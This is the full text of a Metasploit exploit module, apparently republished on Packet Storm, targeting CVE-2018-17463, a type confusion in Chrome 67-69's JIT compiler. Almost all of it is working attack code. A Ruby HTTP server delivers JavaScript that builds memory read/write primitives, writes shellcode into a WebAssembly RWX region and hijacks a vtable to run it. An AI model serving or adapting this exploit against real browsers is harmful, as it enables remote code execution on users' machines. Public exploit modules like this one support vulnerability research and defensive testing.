Google Chrome 67 / 68 / 69 Object.create Type Confusion ≈ Packet Storm


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##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking

include Msf::Exploit::Remote::HttpServer

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Google Chrome 67, 68 and 69 Object.create exploit’,
‘Description’ => %q{
This modules exploits a type confusion in Google Chromes JIT compiler.
The Object.create operation can be used to cause a type confusion between a
PropertyArray and a NameDictionary.
The payload is executed within the rwx region of the sandboxed renderer
process, so the browser must be run with the –no-sandbox option for the
payload to work.
},
‘License’ => MSF_LICENSE,
‘Author’ => [
‘saelo’, # discovery and exploit
‘timwr’, # metasploit module
],
‘References’ => [
[‘CVE’, ‘2018-17463’],
[‘URL’, ‘http://www.phrack.org/papers/jit_exploitation.html’],
[‘URL’, ‘https://ssd-disclosure.com/archives/3783/ssd-advisory-chrome-type-confusion-in-jscreateobject-operation-to-rce’],
[‘URL’, ‘https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf’],
[‘URL’, ‘https://bugs.chromium.org/p/chromium/issues/detail?id=888923’],
],
‘Arch’ => [ ARCH_X64 ],
‘Platform’ => [‘windows’, ‘osx’],
‘DefaultTarget’ => 0,
‘Targets’ => [ [ ‘Automatic’, { } ] ],
‘DisclosureDate’ => ‘Sep 25 2018’))
register_advanced_options([
OptBool.new(‘DEBUG_EXPLOIT’, [false, « Show debug information during exploitation », false]),
])
end

def on_request_uri(cli, request)

if datastore[‘DEBUG_EXPLOIT’] && request.uri =~ %r{/print$*}
print_status(« [*]  » + request.body)
send_response(cli,  »)
return
end

print_status(« Sending #{request.uri} to #{request[‘User-Agent’]} »)

jscript = %Q^
let shellcode = new Uint8Array([#{Rex::Text::to_num(payload.encoded)}]);

let ab = new ArrayBuffer(8);
let floatView = new Float64Array(ab);
let uint64View = new BigUint64Array(ab);
let uint8View = new Uint8Array(ab);

Number.prototype.toBigInt = function toBigInt() {
floatView[0] = this;
return uint64View[0];
};

BigInt.prototype.toNumber = function toNumber() {
uint64View[0] = this;
return floatView[0];
};

function hex(n) {
return ‘0x’ + n.toString(16);
};

function fail(s) {
print(‘FAIL ‘ + s);
throw null;
}

const NUM_PROPERTIES = 32;
const MAX_ITERATIONS = 100000;

function gc() {
for (let i = 0; i < 200; i++) {
new ArrayBuffer(0x100000);
}
}

function make(properties) {
let o = {inline: 42} // TODO
for (let i = 0; i < NUM_PROPERTIES; i++) {
eval(`o.p${i} = properties[${i}];`);
}
return o;
}

function pwn() {
function find_overlapping_properties() {
let propertyNames = [];
for (let i = 0; i < NUM_PROPERTIES; i++) {
propertyNames[i] = `p${i}`;
}
eval(`
function vuln(o) {
let a = o.inline;
this.Object.create(o);
${propertyNames.map((p) => `let ${p} = o.${p};`).join(‘\n’)}
return [${propertyNames.join(‘, ‘)}];
}
`);

let propertyValues = [];
for (let i = 1; i < NUM_PROPERTIES; i++) {
propertyValues[i] = -i;
}

for (let i = 0; i < MAX_ITERATIONS; i++) {
let r = vuln(make(propertyValues));
if (r[1] !== -1) {
for (let i = 1; i < r.length; i++) {
if (i !== -r[i] && r[i] < 0 && r[i] > -NUM_PROPERTIES) {
return [i, -r[i]];
}
}
}
}

fail(« Failed to find overlapping properties »);
}

function addrof(obj) {
eval(`
function vuln(o) {
let a = o.inline;
this.Object.create(o);
return o.p${p1}.x1;
}
`);

let propertyValues = [];
propertyValues[p1] = {x1: 13.37, x2: 13.38};
propertyValues[p2] = {y1: obj};

let i = 0;
for (; i < MAX_ITERATIONS; i++) {
let res = vuln(make(propertyValues));
if (res !== 13.37)
return res.toBigInt()
}

fail(« Addrof failed »);
}

function corrupt_arraybuffer(victim, newValue) {
eval(`
function vuln(o) {
let a = o.inline;
this.Object.create(o);
let orig = o.p${p1}.x2;
o.p${p1}.x2 = ${newValue.toNumber()};
return orig;
}
`);

let propertyValues = [];
let o = {x1: 13.37, x2: 13.38};
propertyValues[p1] = o;
propertyValues[p2] = victim;

for (let i = 0; i < MAX_ITERATIONS; i++) {
o.x2 = 13.38;
let r = vuln(make(propertyValues));
if (r !== 13.38)
return r.toBigInt();
}

fail(« Corrupt ArrayBuffer failed »);
}

let [p1, p2] = find_overlapping_properties();
print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);

let memview_buf = new ArrayBuffer(1024);
let driver_buf = new ArrayBuffer(1024);

gc();

let memview_buf_addr = addrof(memview_buf);
memview_buf_addr–;
print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);

let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);

let driver = new BigUint64Array(driver_buf);
let original_memview_buf_ptr = driver[4];

let memory = {
write(addr, bytes) {
driver[4] = addr;
let memview = new Uint8Array(memview_buf);
memview.set(bytes);
},
read(addr, len) {
driver[4] = addr;
let memview = new Uint8Array(memview_buf);
return memview.subarray(0, len);
},
readPtr(addr) {
driver[4] = addr;
let memview = new BigUint64Array(memview_buf);
return memview[0];
},
writePtr(addr, ptr) {
driver[4] = addr;
let memview = new BigUint64Array(memview_buf);
memview[0] = ptr;
},
addrof(obj) {
memview_buf.leakMe = obj;
let props = this.readPtr(memview_buf_addr + 8n);
return this.readPtr(props + 15n) – 1n;
},
};

// Generate a RWX region for the payload
function get_wasm_instance() {
var buffer = new Uint8Array([
0,97,115,109,1,0,0,0,1,132,128,128,128,0,1,96,0,0,3,130,128,128,128,0,
1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,
128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,
101,108,108,111,0,0,10,136,128,128,128,0,1,130,128,128,128,0,0,11
]);
return new WebAssembly.Instance(new WebAssembly.Module(buffer),{});
}

let wasm_instance = get_wasm_instance();
let wasm_addr = memory.addrof(wasm_instance);
print(« wasm_addr @  » + hex(wasm_addr));
let wasm_rwx_addr = memory.readPtr(wasm_addr + 0xe0n);
print(« wasm_rwx @  » + hex(wasm_rwx_addr));

memory.write(wasm_rwx_addr, shellcode);

let fake_vtab = new ArrayBuffer(0x80);
let fake_vtab_u64 = new BigUint64Array(fake_vtab);
let fake_vtab_addr = memory.readPtr(memory.addrof(fake_vtab) + 0x20n);

let div = document.createElement(‘div’);
let div_addr = memory.addrof(div);
print(‘div_addr @ ‘ + hex(div_addr));
let el_addr = memory.readPtr(div_addr + 0x20n);
print(‘el_addr @ ‘ + hex(div_addr));

fake_vtab_u64.fill(wasm_rwx_addr, 6, 10);
memory.writePtr(el_addr, fake_vtab_addr);

print(‘Triggering…’);

// Trigger virtual call
div.dispatchEvent(new Event(‘click’));

// We are done here, repair the corrupted array buffers
let addr = memory.addrof(driver_buf);
memory.writePtr(addr + 32n, original_driver_buf_ptr);
memory.writePtr(memview_buf_addr + 32n, original_memview_buf_ptr);
}

pwn();
^

if datastore[‘DEBUG_EXPLOIT’]
debugjs = %Q^
print = function(arg) {
var request = new XMLHttpRequest();
request.open(« POST », « /print », false);
request.send(«  » + arg);
};
^
jscript = « #{debugjs}#{jscript} »
else
jscript.gsub!(///.*$/,  ») # strip comments
jscript.gsub!(/^s*prints*(.*?);s*$/,  ») # strip print(*);
end

html = %Q^
<html>
<head>
<script>
#{jscript}
</script>
</head>
<body>
</body>
</html>
^

send_response(cli, html, {‘Content-Type’=>’text/html’, ‘Cache-Control’ => ‘no-cache, no-store, must-revalidate’, ‘Pragma’ => ‘no-cache’, ‘Expires’ => ‘0’})
end

end

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